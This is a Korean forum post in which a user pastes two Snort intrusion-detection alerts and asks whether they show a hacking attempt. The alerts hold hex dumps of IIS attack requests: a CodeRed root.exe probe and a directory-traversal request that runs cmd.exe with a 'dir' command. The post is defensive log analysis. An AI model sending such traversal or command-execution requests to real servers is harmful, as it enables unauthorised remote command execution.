>> Delete No. 60802 article
No. snort log, 이거 해킹 맞는지요? 좀 보아주세요.

등록 2002-11-12 20:48:00 By localhost     조회 14
이름 snort    

		[**] WEB-IIS CodeRed v2 root.exe access [**]
11/12-20:01:48.001355 2xx.xxx.xxx.xxx:1938 -> 2xx.xxx.xxx.xxx:80
TCP TTL:124 TOS:0x0 ID:35568 IpLen:20 DgmLen:112 DF
***AP*** Seq:0x2B6B5193  Ack:0x4C224974  Win:0x4470  TcpLen:20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 72 6F 6F  GET /scripts/roo
74 2E 65 78 65 3F 2F 63 2B 64 69 72 20 48 54 54  t.exe?/c+dir HTT
50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 77 77 77  P/1.0..Host: www
0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F 6E 3A 20 63  ..Connnection: c
6C 6F 73 65 0D 0A 0D 0A                          lose....
 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
 [**] WEB-IIS cmd.exe access [**]
11/12-20:01:48.298328 2xx.xxx.xxx.xxx:1959 -> 2xx.xxx.xxx.xxx:80
TCP TTL:124 TOS:0x0 ID:35675 IpLen:20 DgmLen:136 DF
***AP*** Seq:0x2B7D2C78  Ack:0x4C101BB5  Win:0x4470  TcpLen:20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65  2f../winnt/syste
6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64  m32/cmd.exe?/c+d
69 72 20 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  ir r HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A        
ction: close..  =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[관리자] 패스워드를 입력 하십시오. 답장이 존재하면 함께 삭제됩니다.[ 목록 | 이전 ]
패스워드:    

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved